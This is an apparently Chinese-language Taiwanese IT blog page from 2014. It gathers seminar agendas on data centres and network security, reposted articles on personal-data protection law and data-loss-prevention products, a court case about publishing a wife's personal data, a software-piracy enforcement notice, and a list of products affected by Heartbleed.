2014年4月28日 星期一

2014 企業機房論壇


TimeTopicSpeaker
08:30~09:00報到&交流
09:00~09:30機房整建工程實務案例分享蜜望實企業股份有限公司
資訊副理   劉芳利
09:30~10:10高效益綠色資料中心
台達電子工業股份有限公司
  
10:10~10:50DCIM與雲端綠機房
艾默生網絡能源有限公司
  
10:50~11:10中場休息Coffee Break
11:10~11:50電腦機房供電系統
伊頓飛瑞慕品股份有限公司
  
11:50~12:30PANDUIT 整合性實體層基礎架構新加坡商泛達有限公司
區域經理   劉仁傑
12:30~13:30午餐 Lunch
  分場一
13:30~14:10雲端IDC機房服務
台灣恩悌悌股份有限公司
  
14:10~14:50如何使用監控電源來提升數據中心效能ServerTechnology
亞太地區銷售總監   黃浩然
14:50~15:10中場休息Coffee Break
15:10~15:50自動環控與機房節能
研華股份有限公司
  
15:50~16:30Uptime Institute Tier III 機房設計實務
台灣大哥大股份有限公司
  
16:30交流
  分場二
13:30~14:10空調散熱系統之
機房配置

新新策劃工程顧問有限公司
  
14:10~14:50機房智慧型監控應用方案
宏電科技股份有限公司
  
14:50~15:10中場休息Coffee Break
15:10~15:50省錢大作戰-善用雲端優化機房
數位通國際網路股份有限公司
  
15:50~16:30機房整建工程實務案例魔力門部落格
  ZMAN
16:30交流
備註:主辦單位保留變更議程順序、內容及相關事項之權利。

■  主辦單位  :  DIGITIMES
■  活動日期  :  2014年5月22日(星期四)
■  會議地點  :  六福皇宮 B3會議室
■  報名方式  :  線上報名、傳真報名
■  參加方式  :  免費報名,當日請攜帶報到通知單與名片乙張即可
■  傳真報名  :  +886-2-8712-0232
■  洽詢專線  :  +886-2-8712-8866 分機322 游先生(洽詢時間 09:30~12:00,13:30~18:00)
■  注意事項  :  本活動報名截止日為5月19日(一)。

網路安全與資安防護研討會(台北場)

TimeTopicSpeaker
09:00~09:30來賓報到
09:30~10:10證據保全與數位鑑識之新思維與新趨勢中華民國電腦稽核協會
理事長   林宜隆
10:10~10:50端點安全迎戰APT式攻擊之黃金戰略法則翔偉資安科技有限公司
F-Secure亞洲區病毒威脅實驗室訊息安全技術顧問   吳樹謙
10:50~11:10Tea/Break
11:10~11:50「勿恃敵之不來,恃吾有以待之」- APT防禦之虛實FireEye
台灣總經理   馬勝彰
11:50~12:30混合雲時代,如何打造安全可靠的企業雲台大電機工程研究所
博士候選人   李倫銓
12:30~13:30午餐
13:30~14:10網路駭客與資安廠商的攻防博弈網擎資訊軟體股份有限公司
產品管理部經理   林家正
14:10~14:50即時通訊世代的企業資安管控必勝戰術EVERY8D互動資通股份有限公司
技術長   洪鑫泓
14:50~15:10Tea/Break
15:10~15:50發掘網路資安漏洞、防堵駭客惡意攻擊DEVCORE 戴夫寇爾股份有限公司
執行長暨台灣駭客年會 副總召
翁浩正
15:50~16:30Big Data分析應用與新型態資安防護資策會資安科技研究所
技術研發中心經理   毛敬豪
備註:主辦單位保留變更議程順序、內容及相關事項之權利。

■  主辦單位  :  DIGITIMES
■  活動日期  :  2014年05月07日(星期三)
■  會議地點  :  六福皇宮B3 會議室
■  報名方式  :  線上報名下載報名表
■  參加方式  :  免費報名,當日請攜帶QR Code報到通知單與名片乙張即可
■  傳真報名  :  +886-2-8712-0232
■  洽詢專線  :  +886-2-8712-8866 分機322 游先生(洽詢時間 09:30~12:00,13:30~18:00)
■  注意事項  :  本活動報名截止日為4月30日(三)。

扎穩基礎防護 力求個資外洩極小化

扎穩基礎防護 力求個資外洩極小化

如何善盡資料外洩防護,對各行各業而言,無疑都是至關重大的嚴峻課題,只因為隨著新版個資法、新版營業秘密法相繼上路,彷彿為所企業機構罩上了層層緊箍咒,稍有不慎便將惹禍上身,輕則承受罰款大傷元氣,重則甚至動搖經營根基。

眾所周知,新版個人資料保護法,已於2012年底正式上路,但不少企業卻已從一開始戒慎恐懼,逐漸選擇性淡忘此事,甚至還自我慶幸,認為儘管個資法期初聲勢浩大,但施行至今並未滋生過多糾葛,決定暫且停看聽,先以防火牆、防毒、入侵偵測系統(IPS)等基本資安配備因應即可。

企業防範機密資料外洩,首要之務即是善盡個資機敏檔案的盤點工作;圖為Privacy ID個資掃瞄結果示意圖。安資捷

但上述苟且偷安心態,真的「恰如其分」?答案肯定是錯誤的,此乃由於,個資法絕對不僅止於虛晃一招,而持續如影隨形緊緊纏繞每一企業機構!

先看海外案例。2004年,驚傳駭客入侵美國陸軍資訊系統工程指揮部、國防資訊系統局等重要軍事機構,竊取的資料量達20TB以上。2009年,位在加拿大的多倫多的蒙克國際研究中心赫然發現,一個名為「鬼網」(GhostNet)的電腦間諜組織,利用兩年布局時間,成功入侵全球103個國家共計1,259台電腦,受駭單位遍及外交機構、大使館、國際組織、媒體及非營利組織。

2010年,伊朗核電廠慘遭Stuxnet蠕蟲攻擊,其高速離心機控制設備淪為駭客禁臠,險些釀成核爆之巨大災厄。2011年,美國前三大軍火商與日本大廠Sony,相繼遭到駭客攻擊,導致大量機密資料。2013年3月20日,南韓遭受震驚全球的大規模「進階持續性滲透攻擊(APT)」攻擊,共計波及6間金融機構、3家電視台,造成相關企業的網路與服務中斷,部分網路銀行及ATM服務停止運作,頓時使該國陷入一片混亂。

看到這裡,不免有人納悶,上述案例縱然血淚斑斑,但受駭層次已偏向國防、外交、金融等至高位階,與台灣企業所面對的個資法,又有何干?

內外威脅交迫 不容企業掉以輕心

然而透過這些個案,無異訴說著Cyberwar時代已然來臨,上至政府機關,下至民間企業或非營利組織,無論有意或無意參戰,通通都已置身在戰場之中;隨著駭客攻擊手法不斷精進、威脅指數急遽飆升,企業必須捫心自問,光是憑藉基本資安配備建構防禦工事,擋得了駭客船堅砲利的猛烈襲擊?假使擋不住,那怕企業視為瑰寶的機敏個資,豈不讓人予取予求?一旦遭此不幸,企業恐難脫離個資法究責風暴!

前述案例,均是指向外部有心人士入侵,因而導致機密資料外洩,但其實資料洩漏的破口,絕不僅止於駭客,在多數情況下,內賊同樣可怕。2014年1月,南韓KB國民卡、樂天卡與NH農協卡等三大信用卡公司,驚爆有史以來最大規模個資外洩事件,就連該國總統朴槿惠、聯合國秘書長潘基文的個資也慘遭牽連,深究其事發緣由,乃在於這些信用卡公司聯合委託南韓信用評價公司(KCB)負責開發一套系統,而一名參與其中的KCB技術人員監守自盜所致,因是出自委外廠商所為,並不算是外人,可被視為內賊作亂的經典案例。

當然,若干台灣企業之所以輕忽個資法,並不見得是對駭客或內賊的威脅渾然不覺,而是不認為個資法大刀真的會開鍘;說到這裡,不妨看看本土案例。回顧2013年期間,金管會一共對台灣金控及銀行祭出27件裁罰,其中近五分之一與客戶個人資料保護事項相關,例如某大銀行,因辦理網路銀行業發生疏失,未能有效察覺外部人士瀏覽其內部目錄網頁,造成3.3萬名客戶個資外洩,因而被認定有未落實執行內控的缺失,故依違反銀行法第45條之1第1項規定,以新台幣400萬元高額罰金伺候。

明眼人或許看得出,上述銀行遭罰的法源為銀行法,而非個資法,倘若不是金融業,可能就能置身事外,但這般認知可說大錯特錯,因為該銀行受罰的行徑,已同時觸犯銀行法與個資法,通常主管機關會傾向從不同法源當中,援引最為嚴苛的依據而「從重量刑」,裁罰400萬元已高於個資法究責額度;而各行各業皆有對應之主管機關,一旦遭遇相同情境,極有可能比照辦理,只會罰得更重而非更輕,企業不宜心存僥倖。

更何況,個資法的行政罰責事小,單筆個資賠償金額介於500~20,000元,才算是大事,前述銀行挨罰400萬元,這是一碼事,後續若遇受害客戶集團求償,繼而遭法院判賠鉅額款項,那是另一碼事,兩者並行不悖。由此可見,企業如果未善盡保管之責,因而衍生大規模個資外洩事故,那麼便是「吃不完兜著走」,可能有偌大災難纏身;試想,假使一家中小企業如經查獲洩露萬筆個資,每筆賠判20,000元,即將面臨高達2億元的巨大賠款壓力,事已至此,其營運基業恐一夕崩盤。

專家提醒,若以日本為例,其施行個資法的第三年起,團體訴訟才達到高峰,因此「不是不報、時候未到」,推論台灣與個資外洩相關之團體訴訟潮流,可能在2014~2015年開始盛行,企業必須抱持憂患意識,竭盡所能做好因應準備,勿恃敵之不來、恃吾有以待之!

鎖定個資法12條 做好防禦基本功

不可諱言,雖然個資法適用範圍擴及各行各業,但部分產業基於營運屬性使然,未必會碰觸到大量客戶個資,如同以OEM/ODM代工業務為主的高科技製造業,就是明顯的例子,是否意謂此類企業可稍微鬆懈,無需繃得如此之緊?事實則不然!只因高科技多擁有關鍵技術之智財權,即便可援引新版營業秘密法,針對這些營業秘密施以保護,遏阻不宵員工之輕舉妄動,但萬一仍不幸發生營業秘密外洩情事,對於該企業仍屬重傷害,面子與裡子雙輸。

在面子部分,若企業被證實未盡良善保管責任,導致不宵員工有機可乘,犯事員工固然需面臨嚴厲罰則,企業也將因「保管不力、引人犯罪」而遭究責,同樣會被處以可觀罰金;在裡子部分,對於一般高科技製造業,IP智財權往往牽動龐大商業利益,營運績效或沈或浮,有時就押寶在少數關鍵技術之上,如果因提前外洩而遭破局,恐怕就如同洩了氣的皮球,從此一蹶不振。

問題來了,企業縱使深知個資機敏防護一事非同小可,也明知光靠現有資安配備不足以安枕無憂,但卻不知怎麼做,才能負起應有的保管責任。對此專家建議,企業因應個資防護的基本功課,其實都列在個資法第12條,共計有11項要務,而在此之中,尤其以第2項的「界定個人資料之範圍」、第4項的「事故之預防、通報及應變機制」、第8項的「設備安全管理」、第9項的「資料安全稽核機制」,以及第10項的「使用紀錄、軌跡資料及證據保存」等五大環節最為重要,企業宜先認真思考與規劃,以便將這5項任務做好

在此借用曾多次出現於相關研討會的三步驟攻堅策略,意即先掃出、後管控、再稽核,企業在制定個資安全政策、部署防護措施之前,必須先透過個資盤點程序,以便釐清所欲保護的個資機敏檔案,究竟流落何方,並深入理解個別檔案所對應的價值與風險何在,接著再將高風險檔案收歸集中管制,佐以適當解決方案,確保這些機敏資訊絕無落地之虞。

至於因應業務執行所需,仍須交由同仁分散處理的機敏資料,亦有必要採取嚴格管制措施,一方面先設立資料外洩防護(DLP)特徵庫,以正向或負向表列模式,優先對疑似外洩的行為加以攔阻,另一方面則建立定期掃描、追蹤與稽核機制,詳加留存來源(From)、誰(Who)、動作(What)、時間(When)及目的端(Where)等存取軌跡資訊,以作為日後呈堂舉證的依據

轉載自《DIGITIMES中文網

資料外洩防護 逼使駭客內賊敗興而歸

資料外洩防護 逼使駭客內賊敗興而歸

不可諱言,資料外洩防護是一個長期奮戰的歷程,企業欲求100%保證機敏資料絕不外洩,著實不易,但起碼得借助必要的輔助工具,設下關鍵的過濾與稽核關卡,不讓有心人士輕易得手;因此企業不僅需評估導入DLP,亦應連同其餘配套工具一併納入考量。

正所謂「工欲善其事、必先利其器」,企業意欲防止資料外洩,單憑防毒軟體、VPN、防火牆、入侵偵測系統抑或垃圾郵件過濾系統等現有資安防護方案,顯然有所不足,必須在這些基礎防禦工事,對症下藥部署其他專屬產品,方可望築起強大保護傘。

隨著惡意攻擊不斷推陳出新,使得資料外洩風險節節攀高,導致企業必須持續研究、評估或採用新式防禦工具。ThreatTrack Security

何以既有防護措施,不足以全然防範資料外洩,大致理由有二,其一,對於駭客而言,潛入企業核心系統以盜取機密資料,目的絕不在於炫技、而是牟利,既然利之所趨,自然得想方設法增加成功機率,迴避一干現有防護系統的偵測,已屬必要之惡,令企業防不勝防。

其二,根據資安廠商統計,綜觀近幾年全球資料外洩事件,元兇為外部駭客者,其實佔比不到三成,另高達七成以上,係來自企業合法授權的內部使用者,可通稱為「內賊」,不管他們是無心疏失、或是早有預謀,傳統工具對此可說束手無策,即便是看似嚴密的資料加密方案,亦屬無解。

建立DLP防線 力阻機密資料外流

那麼,企業為了強化資料外洩防護,理當部署哪些產品?顧名思義,產品名稱即為資料外洩防護的DLP,顯然即是值得企業評估採用的重要標的之一;就基本的技術原理而論,DLP主要是透過格式比對、關鍵字過濾、特徵辨識等必要手段,詳加檢查檔案資料有否亟需受保護的機密,一經查證確實夾帶此類內容,則適時加以攔阻,避免機密外流

雖然許多產品都可被歸類為DLP,但箇中仍有型態上的歧異。比方說,依據其部署位置的不同,即可區分為網路型(Network-based)、主機型(Host-based)等產品;前者係佈建於網路閘道口,主要是以過濾流量的方式來控管資料外洩,因此任何意圖以連網裝置夾帶出境的機密檔案,基本上都難逃法眼,至於主機型DLP,即是針對納管的個人電腦植入代理程式,可直接從終端攔阻機密資料外傳,且論及複製、貼圖或列印等資料擷取行為,亦可發揮較為深層的管控力道。

網路型或主機型DLP,各自有何優劣勢?就網路型DLP來看,好處在於其多為獨立的硬體裝置,一般都被架設於防火牆之後,無需針對大量端點佈建代理程式,因而相對易於部署,但仍有其缺點,僅能針對連結企業網路的裝置才能施以管控,無法阻擋員工以攜出筆記型電腦、或複製至隨身碟等方式偷渡資料出境,且所有資料皆需從端點傳送至網路執行過濾,不僅過程緩慢且易造成網路負擔,同時也不支援離線運作,無疑只能防得了君子,而防不了處心積慮的小人。

有關主機型DLP,由於需要在每一端點安裝代理程式,可以想見,必然徒增IT管理負擔,而且每逢端點設備汰換或OS重灌,IT管理者都需重新安裝與設定DLP軟體,且需要借助必要管控手段,防止員工私自移除代理程式,為缺點所在,但其好處亦至為明顯,網路型DLP鞭長莫及的移動裝置或離線狀態管控,對於主機型DLP都不成問題,控制的細膩度相對較佳。

持平而論,對於企業來說,最理想的DLP部署之道,即是綜合佈建上述兩類型產品,可先導入網路型DLP,待確認其過濾能力並無問題,再選擇特定部門,執行主機型DLP的小量測試部署,經確認不會與企業現行應用程式產生衝突,再進行大規模佈建;只不過,企業是否應該一併部署兩類DLP,仍端視其本身的預算能力,以及防護需求大小而定。

至於符合哪些特質的DLP,才適合企業加以導入?其實其間蘊含頗多考量點,有待企業依據自身防護需求及現有環境因素,才可望精挑細選,但萬變不離其宗,依然有幾項大原則,必須多加留意。首先務求DLP產品兼監控與防禦能力,且擁有較低的漏報率與誤報率,詳情如何,一切以實際測試見真章;其次,選擇的DLP產品需具備集中管理機制,便於IT管理者建立並落實安控政策,並迅速獲取相關記錄報告;再者,因應法規遵考量,企業往往需要留存特定資料達一定期限,值此時刻,如果DLP產品本身已具備儲存與備份功能,即有助於企業省卻額外儲存開銷。

更重要的,則是要求選擇的DLP產品,必須適應企業現有的網路或系統架構,不論網路型或主機型DLP,都務必符合此一特質。以網路型產品為例,在部署時無需更動現行網路架構者,理當列為首選,即便需要調整網路架構,也務必搭配Web管理機制,以期簡化管理難度,並將停機時間降至最低。

借助新式防禦工具 防堵資料外洩漏洞

企業僅需導入DLP,即可確保機密資料萬無一失?答案無疑是否定的,只因放眼市場,迄今仍無任何一項產品或技術,就可防止所有資料外洩,因此對於企業的最佳因應策略,實為部署「一組」防護措施,既然是一組,理當並無單押DLP之理。

欲求DLP發揮最大功效,企業必須先行界定機密資料的來源位置與種類,方能產生較為精準的特徵檔,俾使DLP提高過濾與辨識的精準度,因此需要借助個資盤點工具,通盤掌握個資機敏的流向。曾有業者形容,依單筆個資外洩的500~20,000元求償金額來看,個資機敏檔案之於企業的價值,就如同黃金或鑽石般重要,既然是黃金鑽石,即無任由四處散落之理,必須嚴加看管。因此,若說個資盤查是資料外洩防護的第一步,應不為過。

也許有人問,要想盤查個資機敏,可否透過人力來執行?一家擁有20台PC的小企業,其資訊主管認為,每台電腦檔案為數眾多,有些埋藏在深不見底的資料夾路徑,因此光是清查一台電腦,恐怕得耗時1~2個月,更何況20台?此一感言,實已道盡個資盤點工具的重要性。

除此之外,舉凡監控使用者存取資料庫行為的「資料庫安全稽核」產品,防止資料經由Web應用程式洩露的「網頁應用程式防火牆」(WAF),避免高權限用戶或駭客肉雞竊取機密的「特權帳戶管理」系統,乃至於負責日誌管理、即時異常分析的「資安事件管理平台」(SIEM),種種系統工具,亦有助於在機敏資料之前架起天羅地網,竭盡所能填補資訊外洩的破口。 上述防護系統,與諸如防毒軟體、防火牆或入侵偵測系統等傳統資安產品,本質上看似殊途同歸,然深究其運作原理,卻有著莫大不同。有業者形容,若將個資機敏比喻為乳酪,網路攻擊比喻為老鼠,則傳統資安就好比窮追老鼠的貓,如果老鼠速度夠快(意指新式進階攻擊),任憑貓再如何疲於奔命,恐怕也無法扭轉乳酪遭竊的命運,然而類似像資料庫安全稽核或WAF等防護系統,則採取不同思維,猶如乳酪外圍的金鐘罩,不管老鼠想從網站應用程式、資料庫、檔案等不同管道逼近乳酪,最終都將無所遁形、鎩羽而歸。 當然,近年來「進階持續性威脅」(APT)躍為最令人聞風喪膽的惡意攻擊,只因其不著痕跡進逼企業核心系統,層層防禦拿它沒輒,故成為資料外洩的一大隱憂;因此即使上述工具悉數到位,都未必能幫助企業有效抗禦APT,值此時刻,企業另有必要針對新式的APT防禦工具多所評估,深入研究沙箱模擬、端點過濾掃描等相關技術之利弊得失,設法補強這道潛在破口。

轉載自《DIGITIMES中文網

善用專業廠商 快速建構資料防護堡壘

善用專業廠商 快速建構資料防護堡壘

新版個資法上路至今,機敏個資外洩事件時有所聞,導致企業面臨莫大衝擊;迫使企業必須改變以往被動做法,積極主動提升自身資安意識,並加強資安產品採購需求,方能轉危為安,值此時刻,對於相關專業廠商的倚賴度自然提高。

事實上,不管論及資料外洩防護(DLP)、個資盤點、資料庫安全稽核等攸關企業個資機敏防護的產品,綜觀各領域的供應源頭,皆不乏深具國際知名度的大廠,由於品牌名氣響亮,產品規格也看似漂漂亮亮,遂使得不少企業用戶樂於買單。

但企業幾經評估測試、甚至導入使用後,竟赫然發現,外國月亮似乎沒有想像中的圓!有些時候,礙於中文為特殊語言,外來工具未必能精確掃描姓名、地址…等個資項目,導致漏報與誤報情況層出不窮;有些時候,用戶也發現若干資料庫稽核系統,或許當初是因應沙賓法案而誕生,頗擅長控管財務資料,相對疏於探索前端使用者身分,故而在「事、時、地、物」外獨缺「人」重要一角,導致稽核軌跡有欠完善,明顯不符個資法所需。

中華電信SecuWizard/DLP資訊安全監控管理系統架構。中華電信

持平而論,環顧資料外洩防護相關工具,內容辨識為箇中重要程序,因此系統能否熟識中文檔案,的確相當重要;所以若干本土自有產品,能夠在外商廠牌環伺下,猶可在市場佔有一席之地,其道理便在於此。但已有資安專業服務廠商,特別結合學研機構的中文語意分析技術,針對涉及內容辨識的外來產品,予以改良加值,降低語言隔閡之疑慮,從而大幅提升掃描過濾的精準度。

至於部分外商產品功能,不全然契合個資法需求一事,如同上述情節,補強之道同樣有二,一是採用本土業者研發之自有產品,以求恰如其分融入台灣個資法情境,另一則是持續使用高知名外商產品,但借助專業服務廠商系統整合功力,結合其他工具,巧妙填補既有系統功能的若干缺憾。

好產品加專業服務 為資料防護致勝法門

綜上所述,企業意欲建構機密資料之防護堡壘,固然需要仰賴優質產品,但姑且不論產品來源究竟是本土或海外,可以肯定,都需要專業廠商從旁提供建置規劃、系統整合、資安健檢等服務助力,方能與產品相得益彰,協助用戶蓄積足夠防護能量,從而儘速遠離資料外洩陰霾。

要想成為專業廠商,其實不必像是大雜貨店一般,毋需洋洋灑灑端出一缸子產品陣仗,只因為資料外洩防護重點在於精、而不在廣,在於能透過深度的產品布局與整合,拳拳到位力克資安威脅,而非花拳繡腿中看不中用;在此前提下,對於一些富含長期實戰歷練,且深具技術含量的業者,不管其規模是大或小,也無論是否為用戶印象中的大型資安SI,只要端出的解決方案確實精練紮實,處理問題的反應確實明快有效,就值得企業投以信任票。

例如有一家不到20人的小型服務廠商,向來不碰防火牆或防毒等大宗產品,卻眼光獨到,及早朝向個資盤點、資料庫稽核、WAF,甚至是APT防禦等領域布局,每一步棋都明確指向資料外洩防護,甚至不時援引代理產品中的獨特技術,替不少用戶提供健診服務;諸如此類業者,即使人力規模不大,名氣也不若大型SI響亮,但卻不失為協助企業戰勝資安挑戰的好幫手。

另一家本土業者,其主要組成分子,早年皆從事資料庫業務,在長期為企業提供資料庫建置規劃、維護升級、效能調校或災難復原等服務之餘,亦不時收到用戶的求助訊號,要求設法解決資料外洩難題,因此早在個資法尚未施行前,便已對於資料庫稽核、特權存取管理等領域多所涉獵,研發推出相較外商毫不遜色、且更貼近本土應用情境的一系列工具;在企業亟思遵循個資法、打造對應防護機制的同時,此類廠商亦可被列為重要諮詢對象。

中華電信DLP方案 助企業善盡個資防護

至於早有高知名度,且擁有可觀研發人力資源的中華電信,則是另一種典型,只因在多數用戶印象中,該公司久踞電信業龍頭,在於資安系統整合的形象相對不鮮明,然而細究其過往為企業用戶提供「企業除駭大師」、「企業上網內容過濾服務」、「HiNet入侵防護服務」、「HiNet網站安全健檢服務」、「安全評估服務」、「UTM租賃服務」…之種種歷程,便不難發現,中華電信對於專業資安服務的著墨,確實相當深厚。

如今,中華電信為協助企業妥善因應新版個資法,全力遏阻個資及機敏資料外洩事件,因而自行研發並推出相關解決方案,並不忘為企業提出中肯建議;該公司認為,企業除透過技術層面防範資料外洩外,也應從策略層面施行資安策略控管,但最有效的方式,則務先找出企業個資存放位置,才有利於規劃、控管及執行資料外洩防護,在此前提下,企業不妨重新檢視與規劃「個資盤點掃描」、「集中控管企業個資存放」、「改善現行個資存取流程」、「規範與控管使用者之權限」及「整體保管機制」,繼而搭配DLP產品,以期加強資料防護實力。

因個資法議題而備受矚目的DLP產品,一般可分為端點(Endpoint)、網路(Network)、及針對資料庫及檔案伺服器之主動式防護(Discovery)等三種型態,可分別提供企業對於重要資料之不同程度保護。企業欲導入不同類型DLP,所需準備工作也不盡相同,舉凡企業本身規模架構、需求、可採購的預算上限、維運及管理人力的安排,皆是必須詳加考量的關鍵因素。

倘若用戶考量安裝端點型產品,中華電信則提供SecuWizard/DLP資訊安全監控管理系統,一方面藉此協助建立資產、資安、資源及維運支援等監控與管理機制,確保電腦設備符合企業資安規範,二方面則搭配DLP資料外洩防護功能,嚴格監控網路與端點裝置,以防止機敏資料外洩,避免客戶機密及個資外流滋生法律紛擾,終至保障企業數位資產之安全。

如果客戶傾向不改變現有運作架構,中華電信則建議部署網路型DLP Gateway防護系統,藉此分析、過濾及監控內部所有連接至網路的封包,避免企業機敏資料外流,以保護企業商業利益及形象,並減少維運管理的人力負擔。

總括而論,中華電信綜整資產管理、資安管理、資源管理、資料外洩防護、個資盤點等多個面向,輔以個資法相關安全議題,對於不知如何因應個資法規範的用戶,貼心歸納出五大具體方向,包括了制定個資防護資安政策、解決終端安全疑慮、進行個資盤點(藉以釐清個資存放位置,消弭資料外洩風險)、針對終端與網路端提供不同類型DLP監控,最終則透過各項稽核資料,力求持續精進調整資料外洩防護政策。

中華電信強調,其擁有多年ISP營運及軟硬體資安產品銷售經驗,因而可規劃整合各項資源,推出符合市場需求之「企業個資防護解決方案」,幫助用戶藉由不同面向建立「事前預防」、「事中監控」、「事後舉證」等能量,以符合新版個資法規範,並強化資料外洩防護能力。

轉載自《DIGITIMES中文網

2014年4月25日 星期五

登報「尋找逃妻」 男求妻回家反違個資法

登報「尋找逃妻」 男求妻回家反違個資法

台中林姓男子不滿中國籍妻子帶著2名子女返中國不歸,前年10月,在報紙刊登標題為「尋找逃妻」的尋人啟示,要求妻子返家履行同居義務,啟示上揭露妻子的居留證號碼,出生年月日等個人資料,台中高分院以林男行為違反《個人資料保護法》,判處3月刑期,但認林男因一時失慮登啟示,且無前科,給予緩刑2年定讞

林男辯稱尋人啟事的標題「尋找逃妻」是報社業者自行所加,他也主張妻子個資早在他腦海中,他並未蒐集,且他是為了要求妻子回家、為了家庭活動才利用妻子個資,不適用個資保護法。法官指出,林男知道妻子回中國,妻也有留電話,林男也可提告履行同居義務,其利用妻子個資尋人有違比例原則,是否與「尋找逃妻」是報社所加無關,此外,刊登尋人啟示並非日常家務,無法免除《個資法》規範。

林男想求妻子回家,在報上登尋人啟事,卻因洩漏個資緩刑2年定讞。示意圖

轉載自《蘋果日報

查緝盜版大執法,BSA 點名教育業、高科技業、製造業

查緝盜版大執法,BSA 點名教育業、高科技業、製造業

BSA將在4月26日開始配合檢調單位加強盜版軟體查緝,鎖定盜版軟體風險指數高的區域,位於中部以北地區的教育業、高科技業、營造、製造將是鎖定查緝的重點。


台灣軟體聯盟(BSA)宣佈將在4月26日與檢調合作,查緝企業使用盜版軟體,根據該聯盟發佈的台灣軟體盜版風險指數評比,中部以北地區的教育業、高科技業、製造業預料將會是被鎖定的加強查緝對象

儘管BSA積極宣導,但國內這兩年軟體盜版率並未下降,始終維持在37%,無法進一步再降低。為此,BSA準備在4月26日配合檢調單位大執法,鎖定軟體盜版的高風險區域加強查緝。

BSA也公佈了2011到2013年接到檢舉案件而成案的台灣軟體盜版風險指數評比,點名中部以北縣市,以及教育業、高科技、製造業是國內盜版軟體的高風險產業,預料將是這次大執法鎖定查緝的首要對象。BSA也將檢舉最高獎金提高到300萬元以鼓勵員工檢舉。

根據這份風險指數評比,從縣市地區來看,中部以北縣市風險最高,將是加強查緝的地區,特別是以新竹縣風險最高,其次依序為台北市、桃園縣、新竹市、台中市、新北市,這些縣市包括科學園區,為高科技業聚集的區域。

從產業別來看,BSA點名教育業的軟體盜版風險最高,學校或補習班從文書處理到教學軟體,因軟體授權採購不足產生的盜版軟體風險。而高科技業則為台灣賴以出口的重要產業。BSA提醒,使用盜版軟體容易受到內含的惡意程式竊取機密資料,或是在國際貿易上面臨法律等競爭上的風險。

教育業、高科技業之後被BSA點名的危險產業則是製造業、營造業、傳播業。

BSA呼籲企業為避免盜版軟體產生的機密資料竊取、法律責任等風險,應時尚清查軟體資產、授權情形,若有授權不足予以補齊。

轉載自《iThome》

IT產品Heartbleed災情大清查

IT產品Heartbleed災情大清查

企業應立刻清查內部使用了多少Heartbleed受災產品,儘快更新,並持續關注後續災情以防萬一。目前揭露的Heartbleed災情只是冰山一角,企業MIS必須持續關注各種資訊產品的安全更新動態,才能掌握最新的Heartbleed災情。


這次OpenSSL加密的Heartbleed危機,不只許多知名網路服務受創,也波及許多IT產品,不論是底層的作業系統、資料庫、網站伺服器、資安產品、網路通訊及安全設備,甚至是虛擬化平臺,都有傳出受影響的災情。我們也在4月16日時,整理了幾項目前已揭露的重要IT產品受災情況,可供企業參考。

若企業使用了這些受到影響的產品,需儘快更新和採取必要的防護措施,例如重新產生加密金鑰和撤銷舊有的公開金鑰,也要通知相關使用者更換密碼。

不過這份清單並非是完整的受災清單,更多Heartbleed漏洞災情仍持續揭露,企業須持續關注各資訊產品的更新動態,才能掌握最新的Heartbleed災情和影響。因為微軟沒有使用OpenSSL做傳輸加密,是少數不受Heartbleed災情影響的廠商之一。

作業系統產品受災清單

●Android:目前僅發現4.1.1版受影響,Google已釋出修補版本,但仍由各手機業者自行決定釋出更新的時程。

●Red Hat RHEL:6.5以後版本和RHEL 7測試版受到影響,官方已釋出更新,但6.4以前版本不受影響。

●CentOS:6.5版受影響,官方已釋出更新。

●Debian:穩定的Wheezy版本和測試中的Jessie版本均受影響,Squeezex舊版則不受影響,官方已釋出更新。

●Fedora:19和20版受影響,官方已釋出更新。

●FreeBSD:8~10.0版均受到影響,官方已釋出更新。

●openSUSE:12.2版受影響,官方已釋出更新。

●Oracle Linux:6受影響,甲骨文已釋出更新。

●Solaris:11.1版和更早版本不受影響,特定11.2版本受影響,可聯繫Oracle尋求更新。

●Ubuntu:受影響版本包括了12.04LTS版、12.10版和13.10版,官方已釋出更新。

●DragonFlyBSD:3.6.1版受影響,已釋出更新。

●NetBSD:6版受影響,已釋出更新。

●其他受影響的Linux或BSD套件:Slackware 14.0、14.1和現行版本、Scientific Linux 6.5、Gentoo Linux。多已釋出更新。

●不受影響的作業系統產品:Windows Server(包括2003、2003 R2、2008、2008 R2、2012、2012 R2)、OSX、iOS

網站伺服器產品受災清單 

●Apache HTTP Server:可能受到影響。凡使用了OpenSSL 1.0.1到1.0.1f受影響版本的Apache網站伺服器都需更新。OpenSSL已釋出修補程式。

●Nginx:可能受到影響。凡使用了OpenSSL 1.0.1到1.0.1f受影響版本的Nginx網站伺服器都需更新。OpenSSL已釋出修補程式。

●不受影響的網站伺服器產品:微軟IIS、IBM WebSphere。

虛擬化產品受災清單 

●VMware受影響產品:不少VMware產品因使用OpenSSL 1.0.1而受到影響,包括了ESXi 5.5、vCenter Server 5.5、VMware Fusion 6.0.x、VMware Horizon View 5.3 Feature Pack 1、NSX-MH 4.x、NSX-V 6.0.x、NVP 3.x、VMware Fusion 6.0.x等。

●VMware不受影響產品:包括了ESXi/ESX 4.x、ESXi 5.0和5.1版、vCenter Server 5.1以前版本(4.x、5.0與5.1版)、VMware Horizon View 5.x和5.2 Feature Pack 1與Pack 2、VMware Fusion 5.x、VMware ThinApp、VMware Workstation等。完整受影響和不受影響清單請參考VMware官網公告,官方已釋出更新。

●不受影響的虛擬化產品:包括了微軟Hyper-V、XenServer(使用OpenSSL0.9.8舊版),Oracle VM和VirtualBox 4.2和4.3。

資料庫產品受災清單 

●MySQL、MariaDB和PostgreSQL:可能受到影響。凡使用了OpenSSL 1.0.1到1.0.1f受影響版本的資料庫系統都需更新。OpenSSL已釋出修補程式。

●不受影響的產品:甲骨文資料庫、微軟SQL Server。

資安產品受災清單 

●McAfee:多款產品受影響,例如ePolicy Orchestrator、Next Generation Firewall (Stonesoft)、McAfee Firewall Enterprise、McAfee SIEM、McAfee Email Gateway、McAfee Web Gateway等。已提供更新方式,完整清單和更新方式請參考官網。

●Symantec:受影響產品包括SEPM 12.1 RU2到12.1 RU4 MP1。官方網站也提供初步應急處理方式。

●F- Secure:受影響企業產品包括F-Secure Server Security、E-mail和Server Security 10.x到11版、PSB Server Security/Email Server Security 10.00版、F-Secure Messaging Secure Gateway 7.5、Protection Service for Email 7.5。官方已提供更新或因應方式。

●Splunk:受影響產品包括了6.0.0、6.0.1、6.0.2版。官方已提供更新。

●Kaspersky:受影響產品包括Kaspersky Security Center 10 Maintenance Release 1(10.1.249版)和Kaspersky Security Center 10(10.0.3361版),官方已提供更新。

●不受影響產品:趨勢科技資安產品。

網路通訊及安全產品受災廠牌 

